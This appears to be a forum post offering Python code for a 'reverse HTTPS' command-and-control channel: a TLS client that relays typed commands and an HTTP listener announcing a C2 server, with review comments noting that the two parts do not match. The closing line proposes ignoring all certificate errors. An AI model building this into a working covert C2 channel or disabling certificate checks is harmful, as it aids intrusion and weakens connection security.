
Instead of relying on a socket bind for a reverse shell, a reverse HTTPS connection can be used.

client.py

import socket
import ssl

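def reverse_https_connect(ip, port):
    """Open a TLS-wrapped TCP connection to ``ip:port`` and relay typed commands.

    Reads one line at a time from stdin, sends it to the peer and prints the
    peer's reply, until ``quit`` is typed or the peer closes the connection.

    Args:
        ip: Host to connect to. It is also passed as ``server_hostname`` so the
            peer certificate is checked against it.
        port: TCP port to connect to.

    Returns:
        None. Failures are reported on stdout rather than raised.

    NOTE(review): despite the name, this sends raw bytes over TLS, not HTTP
    requests; the listener shown further down is an ``http.server`` handler,
    so confirm the two are actually meant to talk to each other.
    """
    # SERVER_AUTH already sets CERT_REQUIRED and hostname checking; the explicit
    # assignment keeps the intent visible. With the pinned certificate file as
    # the only trust anchor, an arbitrary listener cannot impersonate the server.
    context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations("path/to/server_certificate.pem")  # Specify the path to the server certificate

    raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # The context manager closes the socket on every exit path, including
    # KeyboardInterrupt, which a trailing s.close() after the except would miss.
    with context.wrap_socket(raw_sock, server_hostname=ip) as s:
        try:
            s.connect((ip, port))
            print(f"Connected to {ip}:{port} using reverse HTTPS")

            while True:
                command = input("Enter a command: ")
                s.sendall(command.encode())

                if command.lower() == "quit":
                    break

                data = s.recv(4096)
                if not data:
                    # An empty read means the peer closed the connection;
                    # keep prompting and the next sendall() would fail.
                    print("Connection closed by peer")
                    break
                # A 4096-byte read can split a multi-byte character; do not
                # let that tear down the session.
                print(data.decode(errors="replace"))

        except Exception as e:
            print(f"An error occurred during the reverse HTTPS connection: {str(e)}")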

server.py

Initiating the HTTPS server listener

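    # server_address and HTTPSRequestHandler are defined outside this excerpt.
    httpd = http.server.HTTPServer(server_address, HTTPSRequestHandler)
    # Build a server-side context instead of calling ssl.wrap_socket(): that
    # helper was deprecated in Python 3.7 and removed in 3.12, and it used the
    # legacy module-level defaults rather than the context's hardened ones.
    tls_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    tls_context.load_cert_chain(certfile="cert.pem", keyfile="key.pem")
    httpd.socket = tls_context.wrap_socket(httpd.socket, server_side=True)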

HTTPS Class

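class HTTPSRequestHandler(http.server.SimpleHTTPRequestHandler):
    """Request handler that answers GET and OPTIONS with a fixed status page.

    Only GET and OPTIONS are overridden here; every other method is handled by
    the SimpleHTTPRequestHandler base class.

    NOTE(review): SimpleHTTPRequestHandler's own do_HEAD is still inherited,
    and it serves headers for files in the process's working directory, so a
    HEAD request can reveal names and sizes there. BaseHTTPRequestHandler is
    the safer base if file serving is not intended — confirm before switching.
    """

    # Fixed response body; kept as bytes so its length can be reported.
    _BODY = b'C2 Server is running!'

    def _send_cors_headers(self, content_length=None):
        """Write the 200 status line plus CORS and content headers.

        Args:
            content_length: When given, a Content-Length header is added so
                the client knows where the body ends.
        """
        self.send_response(200)
        # '*' lets a page from any origin read this response; narrow it to a
        # specific origin if the response should not be public.
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'X-Requested-With')
        self.send_header('Content-Type', 'text/html')
        if content_length is not None:
            self.send_header('Content-Length', str(content_length))
        self.end_headers()

    def do_OPTIONS(self):
        """Answer a CORS preflight with headers and an empty body."""
        self._send_cors_headers(content_length=0)

    def do_GET(self):
        """Serve the fixed status body."""
        self._send_cors_headers(content_length=len(self._BODY))
        # send_response()/end_headers() have already put the real status line
        # and headers on the wire; writing another "HTTP/1.1 200 OK" here
        # would land inside the body as literal text.
        self.wfile.write(self._BODY)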


Have you looked into the client not needing a cert — ignoring all cert issues and continuing to establish the HTTPS connection? Might be worth exploring.
